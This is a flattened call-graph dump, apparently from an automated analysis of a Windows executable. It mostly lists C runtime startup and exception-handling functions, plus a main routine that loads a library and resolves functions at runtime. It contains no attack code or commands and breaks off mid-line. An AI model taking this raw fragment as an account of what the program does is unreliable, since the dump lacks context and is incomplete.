3c2d50 _doexit 66 API calls 5478->5479 5480 3c2ed6 5479->5480 5480->5477 5803 3c7b98 5804 3c3f5e __getptd 66 API calls 5803->5804 5805 3c7ba0 5804->5805 5806 3c789c ___FrameUnwindToState 69 API calls 5805->5806 5807 3c7bf0 5806->5807 5808 3c7c25 FindHandlerForForeignException 66 API calls 5807->5808 5809 3c7c11 __setmbcp 5808->5809 5810 3c8598 5811 3c2701 __NMSG_WRITE 5 API calls 5810->5811 5812 3c85ac 5811->5812 5813 3c2701 __NMSG_WRITE 5 API calls 5812->5813 5814 3c85b6 5813->5814 5481 3c791a 5484 3c784d 5481->5484 5485 3c7860 5484->5485 5491 3c7873 5484->5491 5487 3c7892 5485->5487 5489 3c3f5e __getptd 66 API calls 5485->5489 5485->5491 5486 3c3f5e __getptd 66 API calls 5488 3c7884 5486->5488 5488->5487 5490 3c3f5e __getptd 66 API calls 5488->5490 5489->5491 5490->5487 5491->5486 5819 3c749b 5820 3c2701 __NMSG_WRITE 5 API calls 5819->5820 5821 3c74af 5820->5821 5822 3c83b3 ___InternalCxxFrameHandler 71 API calls 5821->5822 5823 3c74c8 5822->5823 5492 3c1010 5495 3c27f4 5492->5495 5494 3c1021 moneypunct 5497 3c277a 5495->5497 5496 3c278e 5496->5494 5497->5496 5498 3c352b _free 66 API calls 5497->5498 5498->5496 5499 3c6810 RtlUnwind 5500 3c8710 5501 3c1420 77 API calls 5500->5501 5502 3c8726 5501->5502 5503 3c309b __cinit 76 API calls 5502->5503 5504 3c8730 5503->5504 5827 3c4991 SetUnhandledExceptionFilter 5828 3c7b8f 5831 3c7978 5828->5831 5830 3c7b97 5832 3c79ba 5831->5832 5833 3c7982 5831->5833 5832->5830 5833->5832 5834 3c3f5e __getptd 66 API calls 5833->5834 5835 3c79ae 5834->5835 5835->5830 5505 3c7a09 5506 3c3925 __CxxUnhandledExceptionFilter 68 API calls 5505->5506 5507 3c7a11 5506->5507 5508 3c320a 5511 3c499f 5508->5511 5512 3c3ee5 __getptd_noexit 66 API calls 5511->5512 5513 3c321b 5512->5513 5517 3c3f78 5519 3c3f84 __setmbcp 5517->5519 5518 3c3f9c 5521 3c3faa 5518->5521 5523 3c352b _free 66 API calls 5518->5523 5519->5518 5520 3c352b _free 66 API calls 5519->5520 5522 3c4086 __setmbcp 5519->5522 5520->5518 5524 3c352b _free 66 API calls 5521->5524 5527 3c3fb8 5521->5527 5523->5521 5524->5527 5525 3c352b _free 66 API calls 5528 3c3fc6 5525->5528 5526 3c3fd4 5530 3c3fe2 5526->5530 5531 3c352b _free 66 API calls 5526->5531 5527->5525 5527->5528 5528->5526 5529 3c352b _free 66 API calls 5528->5529 5529->5526 5532 3c3ff0 5530->5532 5533 3c352b _free 66 API calls 5530->5533 5531->5530 5534 3c4001 5532->5534 5535 3c352b _free 66 API calls 5532->5535 5533->5532 5536 3c38f2 __lock 66 API calls 5534->5536 5535->5534 5537 3c4009 5536->5537 5538 3c402e 5537->5538 5539 3c4015 InterlockedDecrement 5537->5539 5553 3c4092 5538->5553 5539->5538 5540 3c4020 5539->5540 5540->5538 5543 3c352b _free 66 API calls 5540->5543 5543->5538 5544 3c38f2 __lock 66 API calls 5545 3c4042 5544->5545 5546 3c4073 5545->5546 5547 3c58c9 ___removelocaleref 8 API calls 5545->5547 5556 3c409e 5546->5556 5551 3c4057 5547->5551 5550 3c352b _free 66 API calls 5550->5522 5551->5546 5552 3c5962 ___freetlocinfo 66 API calls 5551->5552 5552->5546 5559 3c3819 LeaveCriticalSection 5553->5559 5555 3c403b 5555->5544 5560 3c3819 LeaveCriticalSection 5556->5560 5558 3c4080 5558->5550 5559->5555 5560->5558 5569 3c3668 IsProcessorFeaturePresent 5570 3c7465 5573 3c83b3 5570->5573 5574 3c3f5e __getptd 66 API calls 5573->5574 5575 3c83c0 5574->5575 5576 3c8404 5575->5576 5577 3c748b 5575->5577 5580 3c8427 5575->5580 5576->5577 5581 3c789c 5576->5581 5580->5577 5591 3c8021 5580->5591 5582 3c78a8 __setmbcp 5581->5582 5583 3c3f5e __getptd 66 API calls 5582->5583 5586 3c78c8 __CallSettingFrame@12 5583->5586 5584 3c7939 5585 3c795e ___FrameUnwindToState 66 API calls 5584->5585 5588 3c7945 5585->5588 5586->5584 5587 3c3971 ___FrameUnwindToState 69 API calls 5586->5587 5587->5586 5589 3c3971 ___FrameUnwindToState 69 API calls 5588->5589 5590 3c794f __setmbcp 5588->5590 5589->5590 5590->5577 5592 3c8040 5591->5592 5593 3c3971 ___FrameUnwindToState 69 API calls 5592->5593 5597 3c805a 5592->5597 5593->5597 5594 3c837b 5596 3c3f5e __getptd 66 API calls 5594->5596 5595 3c8362 5667 3c7f1a 5595->5667 5600 3c8383 5596->5600 5602 3c3f5e __getptd 66 API calls 5597->5602 5627 3c8139 FindHandler type_info::operator== ___TypeMatch 5597->5627 5598 3c3925 __CxxUnhandledExceptionFilter 68 API calls 5598->5627 5601 3c8391 5600->5601 5603 3c3971 ___FrameUnwindToState 69 API calls 5600->5603 5601->5577 5604 3c80a1 5602->5604 5603->5601 5604->5601 5606 3c3f5e __getptd 66 API calls 5604->5606 5608 3c80b3 5606->5608 5607 3c2798 std::exception::exception 66 API calls 5607->5627 5609 3c3f5e __getptd 66 API calls 5608->5609 5612 3c80c1 FindHandler 5609->5612 5610 3c3252 __CxxThrowException@8 RaiseException 5610->5627 5611 3c7a3b IsInExceptionSpec 69 API calls 5611->5627 5613 3c3971 ___FrameUnwindToState 69 API calls 5612->5613 5617 3c80dd 5612->5617 5613->5617 5614 3c8107 5615 3c3f5e __getptd 66 API calls 5614->5615 5616 3c810c 5615->5616 5620 3c3f5e __getptd 66 API calls 5616->5620 5616->5627 5617->5614 5619 3c3971 ___FrameUnwindToState 69 API calls 5617->5619 5619->5614 5622 3c811e 5620->5622 5621 3c3f5e 66 API calls __getptd 5621->5627 5623 3c3f5e __getptd 66 API calls 5622->5623 5624 3c8129 5623->5624 5630 3c7a3b 5624->5630 5627->5594 5627->5595 5627->5598 5627->5607 5627->5610 5627->5611 5627->5621 5628 3c789c ___FrameUnwindToState 69 API calls 5627->5628 5636 3c7644 5627->5636 5642 3c7eac 5627->5642 5652 3c7411 RtlUnwind 5627->5652 5653 3c7ab6 5627->5653 5628->5627 5631 3c7a47 5630->5631 5635 3c7a51 ___TypeMatch 5630->5635 5632 3c3971 ___FrameUnwindToState 69 API calls 5631->5632 5633 3c7a4c 5632->5633 5634 3c3925 __CxxUnhandledExceptionFilter 68 API calls 5633->5634 5634->5635 5635->5627 5637 3c765d 5636->5637 5638 3c7691 5637->5638 5641 3c3971 ___FrameUnwindToState 69 API calls 5637->5641 5639 3c76aa 5638->5639 5640 3c3971 ___FrameUnwindToState 69 API calls 5638->5640 5639->5627 5640->5639 5641->5637 5643 3c7eb7 5642->5643 5645 3c7ec4 5642->5645 5683 3c7e1a 5643->5683 5687 3c7411 RtlUnwind 5645->5687 5647 3c7edb 5648 3c789c ___FrameUnwindToState 69 API calls 5647->5648 5649 3c7ee9 5648->5649 5688 3c7aff 5649->5688 5651 3c7f0a FindHandlerForForeignException 5651->5627 5652->5627 5654 3c7ac2 __EH_prolog3_catch 5653->5654 5655 3c3f5e __getptd 66 API calls 5654->5655 5656 3c7ac7 5655->5656 5657 3c7ad5 5656->5657 5659 3c3971 ___FrameUnwindToState 69 API calls 5656->5659 5731 3c395e 5657->5731 5659->5657 5668 3c7f32 5667->5668 5678 3c801c 5667->5678 5669 3c3f5e __getptd 66 API calls 5668->5669 5670 3c7f38 5669->5670 5671 3c7f7d 5670->5671 5672 3c3f5e __getptd 66 API calls 5670->5672 5673 3c7f96 5671->5673 5675 3c3971 ___FrameUnwindToState 69 API calls 5671->5675 5671->5678 5674 3c7f46 5672->5674 5676 3c7644 _GetRangeOfTrysToCheck 69 API calls 5673->5676 5734 3c3dae RtlEncodePointer 5674->5734 5675->5673 5679 3c7fab 5676->5679 5678->5594 5679->5678 5682 3c7eac FindHandlerForForeignException 70 API calls 5679->5682 5680 3c7f51 5680->5671 5735 3c74ce 5680->5735 5682->5679 5684 3c7e26 __setmbcp 5683->5684 5702 3c7c9b 5684->5702 5686 3c7e55 ___BuildCatchObject __setmbcp 5686->5645 5687->5647 5689 3c7b0b __setmbcp 5688->5689 5706 3c76b7 5689->5706 5692 3c3f5e __getptd 66 API calls 5693 3c7b36 5692->5693 5694 3c3f5e __getptd 66 API calls 5693->5694 5695 3c7b44 5694->5695 5696 3c3f5e __getptd 66 API calls 5695->5696 5697 3c7b52 5696->5697 5698 3c3f5e __getptd 66 API calls 5697->5698 5699 3c7b5d _CallCatchBlock2 5698->5699 5711 3c7c25 5699->5711 5701 3c7c11 __setmbcp 5701->5651 5703 3c7ca7 FindHandler __setmbcp 5702->5703 5704 3c3971 ___FrameUnwindToState 69 API calls 5703->5704 5705 3c7d14 ___BuildCatchObject _memmove __setmbcp 5703->5705 5704->5705 5705->5686 5707 3c3f5e __getptd 66 API calls 5706->5707 5708 3c76ca 5707->5708 5709 3c3f5e __getptd 66 API calls 5708->5709 5710 3c76d8 5709->5710 5710->5692 5720 3c770a 5711->5720 5714 3c3f5e __getptd 66 API calls 5715 3c7c39 5714->5715 5716 3c3f5e __getptd 66 API calls 5715->5716 5718 3c7c47 5716->5718 5717 3c7c8a FindHandler 5717->5701 5718->5717 5728 3c76e3 5718->5728 5721 3c3f5e __getptd 66 API calls 5720->5721 5722 3c7715 5721->5722 5723 3c7720 5722->5723 5724 3c7731 5722->5724 5726 3c3f5e __getptd 66 API calls 5723->5726 5725 3c3f5e __getptd 66 API calls 5724->5725 5727 3c7725 5725->5727 5726->5727 5727->5714 5729 3c3f5e __getptd 66 API calls 5728->5729 5730 3c76ed 5729->5730 5730->5717 5732 3c3f5e __getptd 66 API calls 5731->5732 5733 3c3963 5732->5733 5733->5733 5734->5680 5736 3c74f2 5735->5736 5738 3c74e0 5735->5738 5737 3c3f5e __getptd 66 API calls 5736->5737 5737->5738 5738->5671 4162 3c30db 4202 3c4440 4162->4202 4164 3c30e7 GetStartupInfoW 4165 3c30fb HeapSetInformation 4164->4165 4168 3c3106 4164->4168 4165->4168 4167 3c3154 4169 3c315f 4167->4169 4310 3c30b2 4167->4310 4203 3c5155 HeapCreate 4168->4203 4204 3c40a7 GetModuleHandleW 4169->4204 4172 3c3165 4173 3c3170 __RTC_Initialize 4172->4173 4174 3c30b2 _fast_error_exit 66 API calls 4172->4174 4229 3c4f10 GetStartupInfoW 4173->4229 4174->4173 4177 3c318a GetCommandLineA 4242 3c4e79 GetEnvironmentStringsW 4177->4242 4184 3c31af 4266 3c4b48 4184->4266 4185 3c2eda __amsg_exit 66 API calls 4185->4184 4187 3c31b5 4188 3c31c0 4187->4188 4189 3c2eda __amsg_exit 66 API calls 4187->4189 4286 3c2cb9 4188->4286 4189->4188 4191 3c31c8 4192 3c31d3 4191->4192 4193 3c2eda __amsg_exit 66 API calls 4191->4193 4292 3c4ae9 4192->4292 4193->4192 4197 3c31f5 4198 3c3203 4197->4198 4307 3c2e90 4197->4307 4325 3c2ebc 4198->4325 4201 3c3208 __setmbcp 4202->4164 4203->4167 4205 3c40bb 4204->4205 4206 3c40c4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4204->4206 4328 3c3df4 4205->4328 4208 3c410e TlsAlloc 4206->4208 4211 3c415c TlsSetValue 4208->4211 4212 3c421d 4208->4212 4211->4212 4213 3c416d 4211->4213 4212->4172 4333 3c2c62 4213->4333 4218 3c4218 4220 3c3df4 __mtterm 2 API calls 4218->4220 4219 3c41b5 DecodePointer 4221 3c41ca 4219->4221 4220->4212 4221->4218 4342 3c4882 4221->4342 4224 3c41e8 DecodePointer 4225 3c41f9 4224->4225 4225->4218 4226 3c41fd 4225->4226 4348 3c3e31 4226->4348 4228 3c4205 GetCurrentThreadId 4228->4212 4230 3c4882 __calloc_crt 66 API calls 4229->4230 4231 3c4f2e 4230->4231 4232 3c50a3 4231->4232 4235 3c4882 __calloc_crt 66 API calls 4231->4235 4236 3c317e 4231->4236 4238 3c5023 4231->4238 4233 3c50d9 GetStdHandle 4232->4233 4234 3c513d SetHandleCount 4232->4234 4237 3c50eb GetFileType 4232->4237 4241 3c5111 InitializeCriticalSectionAndSpinCount 4232->4241 4233->4232 4234->4236 4235->4231 4236->4177 4318 3c2eda 4236->4318 4237->4232 4238->4232 4239 3c504f GetFileType 4238->4239 4240 3c505a InitializeCriticalSectionAndSpinCount 4238->4240 4239->4238 4239->4240 4240->4236 4240->4238 4241->4232 4241->4236 4243 3c4e95 WideCharToMultiByte 4242->4243 4244 3c319a 4242->4244 4246 3c4eca 4243->4246 4247 3c4f02 FreeEnvironmentStringsW 4243->4247 4255 3c4dbe 4244->4255 4248 3c483d __malloc_crt 66 API calls 4246->4248 4247->4244 4249 3c4ed0 4248->4249 4249->4247 4250 3c4ed8 WideCharToMultiByte 4249->4250 4251 3c4eea 4250->4251 4252 3c4ef6 FreeEnvironmentStringsW 4250->4252 4253 3c352b _free 66 API calls 4251->4253 4252->4244 4254 3c4ef2 4253->4254 4254->4252 4256 3c4dd8 GetModuleFileNameA 4255->4256 4257 3c4dd3 4255->4257 4258 3c4dff 4256->4258 4597 3c6239 4257->4597 4591 3c4c24 4258->4591 4261 3c31a4 4261->4184 4261->4185 4263 3c483d __malloc_crt 66 API calls 4264 3c4e41 4263->4264 4264->4261 4265 3c4c24 _parse_cmdline 76 API calls 4264->4265 4265->4261 4267 3c4b51 4266->4267 4270 3c4b56 _strlen 4266->4270 4268 3c6239 ___initmbctable 94 API calls 4267->4268 4268->4270 4269 3c4882 __calloc_crt 66 API calls 4276 3c4b8b _strlen 4269->4276 4270->4269 4273 3c4b64 4270->4273 4271 3c4bda 4272 3c352b _free 66 API calls 4271->4272 4272->4273 4273->4187 4274 3c4882 __calloc_crt 66 API calls 4274->4276 4275 3c4c00 4277 3c352b _free 66 API calls 4275->4277 4276->4271 4276->4273 4276->4274 4276->4275 4279 3c4c17 4276->4279 5038 3c33a4 4276->5038 4277->4273 4280 3c3d15 __invoke_watson 10 API calls 4279->4280 4282 3c4c23 4280->4282 4281 3c674d __wincmdln 76 API calls 4281->4282 4282->4281 4284 3c4cb0 4282->4284 4283 3c4dae 4283->4187 4284->4283 4285 3c674d 76 API calls __wincmdln 4284->4285 4285->4284 4288 3c2cc7 __IsNonwritableInCurrentImage 4286->4288 5047 3c42c3 4288->5047 4289 3c2ce5 __initterm_e 4291 3c2d06 __IsNonwritableInCurrentImage 4289->4291 5050 3c309b 4289->5050 4291->4191 4293 3c4af7 4292->4293 4295 3c4afc 4292->4295 4294 3c6239 ___initmbctable 94 API calls 4293->4294 4294->4295 4296 3c31d9 4295->4296 4297 3c674d __wincmdln 76 API calls 4295->4297 4298 3c1320 LoadLibraryA 4296->4298 4297->4295 4299 3c1330 4298->4299 4300 3c133a GetProcAddress 4299->4300 4301 3c2e90 66 API calls 4299->4301 4302 3c135b 4300->4302 4303 3c1354 4300->4303 4301->4300 5115 3c1eb0 4302->5115 4304 3c2e90 66 API calls 4303->4304 4304->4302 5329 3c2d50 4307->5329 4309 3c2ea1 4309->4198 4311 3c30c5 4310->4311 4312 3c30c0 4310->4312 4314 3c4655 __NMSG_WRITE 66 API calls 4311->4314 4313 3c4804 __FF_MSGBANNER 66 API calls 4312->4313 4313->4311 4315 3c30cd 4314->4315 4316 3c2c38 _doexit 3 API calls 4315->4316 4317 3c30d7 4316->4317 4317->4169 4319 3c4804 __FF_MSGBANNER 66 API calls 4318->4319 4320 3c2ee4 4319->4320 4321 3c4655 __NMSG_WRITE 66 API calls 4320->4321 4322 3c2eec 4321->4322 5359 3c2ea6 4322->5359 4326 3c2d50 _doexit 66 API calls 4325->4326 4327 3c2ec7 4326->4327 4327->4201 4329 3c3dfe DecodePointer 4328->4329 4330 3c3e0d 4328->4330 4329->4330 4331 3c3e2c 4330->4331 4332 3c3e1e TlsFree 4330->4332 4331->4331 4332->4331 4361 3c3dae RtlEncodePointer 4333->4361 4335 3c2c6a __init_pointers __initp_misc_winsig 4362 3c39a9 EncodePointer 4335->4362 4337 3c2c90 EncodePointer EncodePointer EncodePointer EncodePointer 4338 3c3778 4337->4338 4339 3c3783 4338->4339 4340 3c378d InitializeCriticalSectionAndSpinCount 4339->4340 4341 3c37b0 4339->4341 4340->4339 4340->4341 4341->4218 4341->4219 4345 3c488b 4342->4345 4344 3c41e0 4344->4218 4344->4224 4345->4344 4346 3c48a9 Sleep 4345->4346 4363 3c65cb 4345->4363 4347 3c48be 4346->4347 4347->4344 4347->4345 4400 3c4440 4348->4400 4350 3c3e3d GetModuleHandleW 4401 3c38f2 4350->4401 4352 3c3e7b InterlockedIncrement 4408 3c3ed3 4352->4408 4355 3c38f2 __lock 64 API calls 4356 3c3e9c 4355->4356 4411 3c583a InterlockedIncrement 4356->4411 4358 3c3eba 4423 3c3edc 4358->4423 4360 3c3ec7 __setmbcp 4360->4228 4361->4335 4362->4337 4364 3c65d7 4363->4364 4366 3c65f2 4363->4366 4365 3c65e3 4364->4365 4364->4366 4372 3c4264 4365->4372 4367 3c6605 RtlAllocateHeap 4366->4367 4369 3c662c 4366->4369 4375 3c3d86 DecodePointer 4366->4375 4367->4366 4367->4369 4369->4345 4377 3c3ee5 GetLastError 4372->4377 4374 3c4269 4374->4345 4376 3c3d9b 4375->4376 4376->4366 4391 3c3dc0 TlsGetValue 4377->4391 4380 3c3f52 SetLastError 4380->4374 4381 3c4882 __calloc_crt 62 API calls 4382 3c3f10 4381->4382 4382->4380 4383 3c3f18 DecodePointer 4382->4383 4384 3c3f2d 4383->4384 4385 3c3f49 4384->4385 4386 3c3f31 4384->4386 4394 3c352b 4385->4394 4388 3c3e31 __initptd 62 API calls 4386->4388 4390 3c3f39 GetCurrentThreadId 4388->4390 4389 3c3f4f 4389->4380 4390->4380 4392 3c3dd5 DecodePointer TlsSetValue 4391->4392 4393 3c3df0 4391->4393 4392->4393 4393->4380 4393->4381 4395 3c3536 HeapFree 4394->4395 4399 3c355f _free 4394->4399 4396 3c354b 4395->4396 4395->4399 4397 3c4264 __setmbcp 64 API calls 4396->4397 4398 3c3551 GetLastError 4397->4398 4398->4399 4399->4389 4400->4350 4402 3c391a EnterCriticalSection 4401->4402 4403 3c3907 4401->4403 4402->4352 4426 3c3830 4403->4426 4405 3c390d 4405->4402 4406 3c2eda __amsg_exit 65 API calls 4405->4406 4407 3c3919 4406->4407 4407->4402 4589 3c3819 LeaveCriticalSection 4408->4589 4410 3c3e95 4410->4355 4412 3c5858 InterlockedIncrement 4411->4412 4413 3c585b 4411->4413 4412->4413 4414 3c5868 4413->4414 4415 3c5865 InterlockedIncrement 4413->4415 4416 3c5875 4414->4416 4417 3c5872 InterlockedIncrement 4414->4417 4415->4414 4418 3c587f InterlockedIncrement 4416->4418 4420 3c5882 4416->4420 4417->4416 4418->4420 4419 3c589b InterlockedIncrement 4419->4420 4420->4419 4421 3c58b6 InterlockedIncrement 4420->4421 4422 3c58ab InterlockedIncrement 4420->4422 4421->4358 4422->4420 4590 3c3819 LeaveCriticalSection 4423->4590 4425 3c3ee3 4425->4360 4427 3c383c __setmbcp 4426->4427 4428 3c3862 4427->4428 4451 3c4804 4427->4451 4436 3c3872 __setmbcp 4428->4436 4487 3c483d 4428->4487 4434 3c3884 4438 3c4264 __setmbcp 65 API calls 4434->4438 4435 3c3893 4439 3c38f2 __lock 65 API calls 4435->4439 4436->4405 4438->4436 4441 3c389a 4439->4441 4442 3c38cd 4441->4442 4443 3c38a2 InitializeCriticalSectionAndSpinCount 4441->4443 4444 3c352b _free 65 API calls 4442->4444 4445 3c38be 4443->4445 4446 3c38b2 4443->4446 4444->4445 4493 3c38e9 4445->4493 4447 3c352b _free 65 API calls 4446->4447 4449 3c38b8 4447->4449 4450 3c4264 __setmbcp 65 API calls 4449->4450 4450->4445 4496 3c658c 4451->4496 4453 3c480b 4454 3c658c __NMSG_WRITE 66 API calls 4453->4454 4458 3c4818 4453->4458 4454->4458 4455 3c4655 __NMSG_WRITE 66 API calls 4456 3c4830 4455->4456 4459 3c4655 __NMSG_WRITE 66 API calls 4456->4459 4457 3c3851 4460 3c4655 4457->4460 4458->4455 4458->4457 4459->4457 4461 3c4676 __NMSG_WRITE 4460->4461 4463 3c658c __NMSG_WRITE 63 API calls 4461->4463 4483 3c4792 4461->4483 4465 3c4690 4463->4465 4464 3c3858 4484 3c2c38 4464->4484 4466 3c47a1 GetStdHandle 4465->4466 4467 3c658c __NMSG_WRITE 63 API calls 4465->4467 4470 3c47af _strlen 4466->4470 4466->4483 4468 3c46a1 4467->4468 4468->4466 4469 3c46b3 4468->4469 4469->4483 4521 3c6529 4469->4521 4473 3c47e5 WriteFile 4470->4473 4470->4483 4473->4483 4474 3c46df GetModuleFileNameW 4475 3c4700 4474->4475 4479 3c470c _wcslen 4474->4479 4476 3c6529 __NMSG_WRITE 63 API calls 4475->4476 4476->4479 4477 3c3d15 __invoke_watson 10 API calls 4477->4479 4478 3c63cc 63 API calls __NMSG_WRITE 4478->4479 4479->4477 4479->4478 4481 3c4782 4479->4481 4530 3c6441 4479->4530 4539 3c6260 4481->4539 4557 3c2701 4483->4557 4567 3c2c0d GetModuleHandleW 4484->4567 4490 3c4846 4487->4490 4489 3c387d 4489->4434 4489->4435 4490->4489 4491 3c485d Sleep 4490->4491 4571 3c3403 4490->4571 4492 3c4872 4491->4492 4492->4489 4492->4490 4588 3c3819 LeaveCriticalSection 4493->4588 4495 3c38f0 4495->4436 4497 3c6598 4496->4497 4498 3c65a2 4497->4498 4499 3c4264 __setmbcp 66 API calls 4497->4499 4498->4453 4500 3c65bb 4499->4500 4503 3c3d67 4500->4503 4506 3c3d3a DecodePointer 4503->4506 4507 3c3d4f 4506->4507 4512 3c3d15 4507->4512 4509 3c3d66 4510 3c3d3a _raise 10 API calls 4509->4510 4511 3c3d73 4510->4511 4511->4453 4515 3c3bec 4512->4515 4516 3c3c0b _memset __call_reportfault 4515->4516 4517 3c3c29 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 4516->4517 4518 3c3cf7 __call_reportfault 4517->4518 4519 3c2701 __NMSG_WRITE 5 API calls 4518->4519 4520 3c3d13 GetCurrentProcess TerminateProcess 4519->4520 4520->4509 4522 3c653e 4521->4522 4523 3c6537 4521->4523 4524 3c4264 __setmbcp 66 API calls 4522->4524 4523->4522 4528 3c655f 4523->4528 4525 3c6543 4524->4525 4526 3c3d67 _raise 11 API calls 4525->4526 4527 3c46d4 4526->4527 4527->4474 4527->4479 4528->4527 4529 3c4264 __setmbcp 66 API calls 4528->4529 4529->4525 4535 3c6453 4530->4535 4531 3c6457 4532 3c645c 4531->4532 4533 3c4264 __setmbcp 66 API calls 4531->4533 4532->4479 4534 3c6473 4533->4534 4536 3c3d67 _raise 11 API calls 4534->4536 4535->4531 4535->4532 4537 3c649a 4535->4537 4536->4532 4537->4532 4538 3c4264 __setmbcp 66 API calls 4537->4538 4538->4534 4565 3c3dae RtlEncodePointer 4539->4565 4541 3c6286 4542 3c6296 LoadLibraryW 4541->4542 4543 3c6313 4541->4543 4544 3c62ab GetProcAddress 4542->4544 4552 3c63ab 4542->4552 4548 3c632d DecodePointer DecodePointer 4543->4548 4555 3c6340 4543->4555 4547 3c62c1 7 API calls 4544->4547 4544->4552 4545 3c639f DecodePointer 4545->4552 4546 3c6376 DecodePointer 4546->4545 4550 3c637d 4546->4550 4547->4543 4551 3c6303 GetProcAddress EncodePointer 4547->4551 4548->4555 4549 3c2701 __NMSG_WRITE 5 API calls 4553 3c63ca 4549->4553 4550->4545 4554 3c6390 DecodePointer 4550->4554 4551->4543 4552->4549 4553->4483 4554->4545 4556 3c6363 4554->4556 4555->4545 4555->4546 4555->4556 4556->4545 4558 3c2709 4557->4558 4559 3c270b IsDebuggerPresent 4557->4559 4558->4464 4566 3c520e 4559->4566 4562 3c336b SetUnhandledExceptionFilter UnhandledExceptionFilter 4563 3c3388 __call_reportfault 4562->4563 4564 3c3390 GetCurrentProcess TerminateProcess 4562->4564 4563->4564 4564->4464 4565->4541 4566->4562 4568 3c2c36 ExitProcess 4567->4568 4569 3c2c21 GetProcAddress 4567->4569 4569->4568 4570 3c2c31 4569->4570 4570->4568 4572 3c3480 4571->4572 4576 3c3411 4571->4576 4573 3c3d86 _malloc DecodePointer 4572->4573 4574 3c3486 4573->4574 4577 3c4264 __setmbcp 65 API calls 4574->4577 4575 3c341c 4575->4576 4578 3c4804 __FF_MSGBANNER 65 API calls 4575->4578 4581 3c4655 __NMSG_WRITE 65 API calls 4575->4581 4585 3c2c38 _doexit 3 API calls 4575->4585 4576->4575 4579 3c343f RtlAllocateHeap 4576->4579 4582 3c346c 4576->4582 4583 3c3d86 _malloc DecodePointer 4576->4583 4586 3c346a 4576->4586 4580 3c3478 4577->4580 4578->4575 4579->4576 4579->4580 4580->4490 4581->4575 4584 3c4264 __setmbcp 65 API calls 4582->4584 4583->4576 4584->4586 4585->4575 4587 3c4264 __setmbcp 65 API calls 4586->4587 4587->4580 4588->4495 4589->4410 4590->4425 4593 3c4c43 4591->4593 4596 3c4cb0 4593->4596 4601 3c674d 4593->4601 4594 3c4dae 4594->4261 4594->4263 4595 3c674d 76 API calls __wincmdln 4595->4596 4596->4594 4596->4595 4598 3c6242 4597->4598 4600 3c6249 4597->4600 4925 3c609f 4598->4925 4600->4256 4604 3c66fa 4601->4604 4607 3c5731 4604->4607 4608 3c5744 4607->4608 4612 3c5791 4607->4612 4615 3c3f5e 4608->4615 4612->4593 4613 3c5771 4613->4612 4635 3c5d96 4613->4635 4616 3c3ee5 __getptd_noexit 66 API calls 4615->4616 4617 3c3f66 4616->4617 4618 3c3f73 4617->4618 4619 3c2eda __amsg_exit 66 API calls 4617->4619 4618->4613 4620 3c5afa 4618->4620 4619->4618 4621 3c5b06 __setmbcp 4620->4621 4622 3c3f5e __getptd 66 API calls 4621->4622 4623 3c5b0b 4622->4623 4624 3c5b39 4623->4624 4626 3c5b1d 4623->4626 4625 3c38f2 __lock 66 API calls 4624->4625 4627 3c5b40 4625->4627 4628 3c3f5e __getptd 66 API calls 4626->4628 4651 3c5aad 4627->4651 4630 3c5b22 4628->4630 4633 3c5b30 __setmbcp 4630->4633 4634 3c2eda __amsg_exit 66 API calls 4630->4634 4633->4613 4634->4633 4636 3c5da2 __setmbcp 4635->4636 4637 3c3f5e __getptd 66 API calls 4636->4637 4638 3c5da7 4637->4638 4639 3c5db9 4638->4639 4640 3c38f2 __lock 66 API calls 4638->4640 4643 3c5dc7 __setmbcp 4639->4643 4647 3c2eda __amsg_exit 66 API calls 4639->4647 4641 3c5dd7 4640->4641 4642 3c5e20 4641->4642 4644 3c5dee InterlockedDecrement 4641->4644 4645 3c5e08 InterlockedIncrement 4641->4645 4921 3c5e31 4642->4921 4643->4612 4644->4645 4648 3c5df9 4644->4648 4645->4642 4647->4643 4648->4645 4649 3c352b _free 66 API calls 4648->4649 4650 3c5e07 4649->4650 4650->4645 4652 3c5aef 4651->4652 4653 3c5aba 4651->4653 4659 3c5b67 4652->4659 4653->4652 4654 3c583a ___addlocaleref 8 API calls 4653->4654 4655 3c5ad0 4654->4655 4655->4652 4662 3c58c9 4655->4662 4920 3c3819 LeaveCriticalSection 4659->4920 4661 3c5b6e 4661->4630 4663 3c595d 4662->4663 4664 3c58da InterlockedDecrement 4662->4664 4663->4652 4676 3c5962 4663->4676 4665 3c58ef InterlockedDecrement 4664->4665 4666 3c58f2 4664->4666 4665->4666 4667 3c58fc InterlockedDecrement 4666->4667 4668 3c58ff 4666->4668 4667->4668 4669 3c590c 4668->4669 4670 3c5909 InterlockedDecrement 4668->4670 4671 3c5916 InterlockedDecrement 4669->4671 4673 3c5919 4669->4673 4670->4669 4671->4673 4672 3c5932 InterlockedDecrement 4672->4673 4673->4672 4674 3c5942 InterlockedDecrement 4673->4674 4675 3c594d InterlockedDecrement 4673->4675 4674->4673 4675->4663 4677 3c59e6 4676->4677 4680 3c5979 4676->4680 4678 3c352b _free 66 API calls 4677->4678 4679 3c5a33 4677->4679 4681 3c5a07 4678->4681 4692 3c5a5c 4679->4692 4746 3c6a36 4679->4746 4680->4677 4686 3c59ad 4680->4686 4690 3c352b _free 66 API calls 4680->4690 4683 3c352b _free 66 API calls 4681->4683 4685 3c5a1a 4683->4685 4694 3c352b _free 66 API calls 4685->4694 4695 3c352b _free 66 API calls 4686->4695 4705 3c59ce 4686->4705 4687 3c352b _free 66 API calls 4696 3c59db 4687->4696 4688 3c5aa1 4691 3c352b _free 66 API calls 4688->4691 4689 3c352b _free 66 API calls 4689->4692 4693 3c59a2 4690->4693 4697 3c5aa7 4691->4697 4692->4688 4701 3c352b 66 API calls _free 4692->4701 4706 3c6e16 4693->4706 4699 3c5a28 4694->4699 4700 3c59c3 4695->4700 4702 3c352b _free 66 API calls 4696->4702 4697->4652 4703 3c352b _free 66 API calls 4699->4703 4734 3c6dad 4700->4734 4701->4692 4702->4677 4703->4679 4705->4687 4707 3c6e27 4706->4707 4733 3c6f10 4706->4733 4708 3c6e38 4707->4708 4709 3c352b _free 66 API calls 4707->4709 4710 3c6e4a 4708->4710 4711 3c352b _free 66 API calls 4708->4711 4709->4708 4712 3c352b _free 66 API calls 4710->4712 4714 3c6e5c 4710->4714 4711->4710 4712->4714 4713 3c352b _free 66 API calls 4715 3c6e6e 4713->4715 4714->4713 4714->4715 4716 3c352b _free 66 API calls 4715->4716 4717 3c6e80 4715->4717 4716->4717 4718 3c6e92 4717->4718 4719 3c352b _free 66 API calls 4717->4719 4720 3c6ea4 4718->4720 4722 3c352b _free 66 API calls 4718->4722 4719->4718 4721 3c6eb6 4720->4721 4723 3c352b _free 